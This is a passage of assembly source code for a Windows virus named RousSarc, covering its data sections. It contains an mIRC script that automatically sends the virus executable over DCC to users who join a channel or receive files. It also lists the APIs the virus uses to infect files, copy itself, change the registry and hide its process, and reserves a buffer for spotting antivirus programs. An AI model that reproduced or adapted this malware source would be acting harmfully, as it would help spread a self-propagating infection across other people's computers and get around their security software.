db 'n0=on 1:join:#: { if ( $nick == $me ) halt', 13d,10d
|
|||
|
db 'n1= else .timer 1 30 .dcc send $nick C:\RousSarc.EXE }', 13d,10d
|
|||
|
db 'n2=on *:filesent:*.*: { if ( $nick != $me ) .dcc send $nick C:\RousSarc.EXE }', 13d,10d
|
|||
|
EndScript:
|
|||
|
mircINI db 'mirc.ini',0
|
|||
|
MIRCrfiles db 'rfiles',0 ;what to patch
|
|||
|
MOffset db 'n2',0
|
|||
|
MIRCprot db 'RousSarc.ini',0
|
|||
|
|
|||
|
; Names of the API's we need
|
|||
|
Kernel32Names:
|
|||
|
NumberOfKernel32APIS equ 21d
|
|||
|
|
|||
|
db 'FindFirstFileA', 0
|
|||
|
db 'FindNextFileA', 0
|
|||
|
db 'FindClose', 0
|
|||
|
db 'CreateFileA', 0
|
|||
|
db 'CloseHandle', 0
|
|||
|
db 'CreateFileMappingA', 0
|
|||
|
db 'MapViewOfFile', 0
|
|||
|
db 'UnmapViewOfFile', 0
|
|||
|
db 'GetCommandLineA',0
|
|||
|
db 'ReadFile',0
|
|||
|
db 'CreateProcessA',0
|
|||
|
db 'GetSystemDirectoryA',0
|
|||
|
db 'CopyFileA',0
|
|||
|
db 'GetCurrentProcessId',0
|
|||
|
db 'RegisterServiceProcess',0
|
|||
|
db 'GetCurrentDirectoryA',0
|
|||
|
db 'SetCurrentDirectoryA',0
|
|||
|
db 'GetWindowsDirectoryA',0
|
|||
|
db 'GetFullPathNameA',0
|
|||
|
db 'WritePrivateProfileStringA',0
|
|||
|
db 'WriteFile',0
|
|||
|
|
|||
|
advname db 'advapi32',0
|
|||
|
|
|||
|
AdvapiNames:
|
|||
|
NumberOfAdvapiAPIS equ 6
|
|||
|
|
|||
|
db 'RegOpenKeyExA',0
|
|||
|
db 'RegQueryValueExA',0
|
|||
|
db 'RegCloseKey',0
|
|||
|
db 'RegSetValueExA',0
|
|||
|
db 'RegCreateKeyExA',0
|
|||
|
db 'RegEnumKeyA',0
|
|||
|
|
|||
|
StartupInfo:
|
|||
|
db 64d
|
|||
|
db 63d dup (0)
|
|||
|
|
|||
|
ProcessInformation:
|
|||
|
hProcess dd 0h
|
|||
|
hThread dd 0h
|
|||
|
dwProcessId dd 0h
|
|||
|
dwThreadId dd 0h
|
|||
|
|
|||
|
; ***************************************************************************
|
|||
|
; -------------------[ Uninitialized First Part Data ]-----------------------
|
|||
|
; ***************************************************************************
|
|||
|
.DATA?
|
|||
|
; API's we need for first Part
|
|||
|
XFindFirstFileA dd ?
|
|||
|
XFindNextFileA dd ?
|
|||
|
XFindClose dd ?
|
|||
|
XCreateFileA dd ?
|
|||
|
XCloseHandle dd ?
|
|||
|
XCreateFileMappingA dd ?
|
|||
|
XMapViewOfFile dd ?
|
|||
|
XUnmapViewOfFile dd ?
|
|||
|
XGetCommandLineA dd ?
|
|||
|
XReadFile dd ?
|
|||
|
XCreateProcessA dd ?
|
|||
|
XGetSystemDirectoryA dd ?
|
|||
|
XCopyFileA dd ?
|
|||
|
XGetCurrentProcessId dd ?
|
|||
|
XRegisterServiceProcess dd ?
|
|||
|
XGetCurrentDirectoryA dd ?
|
|||
|
XSetCurrentDirectoryA dd ?
|
|||
|
XGetWindowsDirectoryA dd ?
|
|||
|
XGetFullPathNameA dd ?
|
|||
|
XWritePrivateProfileStringA dd ?
|
|||
|
XWriteFile dd ?
|
|||
|
|
|||
|
; API's we need to edit the Registry
|
|||
|
XRegOpenKeyExA dd ?
|
|||
|
XRegQueryValueExA dd ?
|
|||
|
XRegCloseKey dd ?
|
|||
|
XRegSetValueExA dd ?
|
|||
|
XRegCreateKeyExA dd ?
|
|||
|
XRegEnumKeyA dd ?
|
|||
|
|
|||
|
ADVHandle dd ? ; Handle of ADVAPI32.dll
|
|||
|
|
|||
|
NewSize dd ? ; New Filesize
|
|||
|
CmdLine dd ? ; Commandline
|
|||
|
|
|||
|
; Struktur for FindFirstFile / Next
|
|||
|
FILETIME STRUC
|
|||
|
FT_dwLowDateTime dd ?
|
|||
|
FT_dwHighDateTime dd ?
|
|||
|
FILETIME ENDS
|
|||
|
|
|||
|
; data for FindFirstFile / Next API
|
|||
|
WIN32_FIND_DATA label byte
|
|||
|
WFD_dwFileAttributes dd ?
|
|||
|
WFD_ftCreationTime FILETIME ?
|
|||
|
WFD_ftLastAccessTime FILETIME ?
|
|||
|
WFD_ftLastWriteTime FILETIME ?
|
|||
|
WFD_nFileSizeHigh dd ?
|
|||
|
WFD_nFileSizeLow dd ?
|
|||
|
WFD_dwReserved0 dd ?
|
|||
|
WFD_dwReserved1 dd ?
|
|||
|
WFD_szFileName db 260d dup (?)
|
|||
|
WFD_szAlternateFileName db 13 dup (?)
|
|||
|
WFD_szAlternateEnding db 03 dup (?)
|
|||
|
|
|||
|
FileHandle dd ? ; Filehandle
|
|||
|
MapHandle dd ? ; Handle of the Map
|
|||
|
MapAddress dd ? ; Offset of the Map
|
|||
|
Handle dd ?
|
|||
|
|
|||
|
Dispostiton dd ? ; dispostition when creating a reg key
|
|||
|
RegHandle dd ? ; handle of an opened registry key
|
|||
|
RegData1 dd ? ; Bytes read
|
|||
|
|
|||
|
|
|||
|
InfCounter db ? ; Counter
|
|||
|
FindHandle dd ? ; Handle for FindFirstFile API
|
|||
|
FileBuffer db VirusSize dup (?)
|
|||
|
; We temporarily save the name of a possible AV
|
|||
|
; to check if it is one
|
|||
|
NameBuffer db 255d dup (?)
|
|||
|
CurrentPath db 255d dup (?)
|
|||
|
|
|||
|
|
|||
|
; ***************************************************************************
|
|||
|
; ------------------------[ That's all, go home ]----------------------------
|
|||
|
; ***************************************************************************
|
|||
|
end Virus
|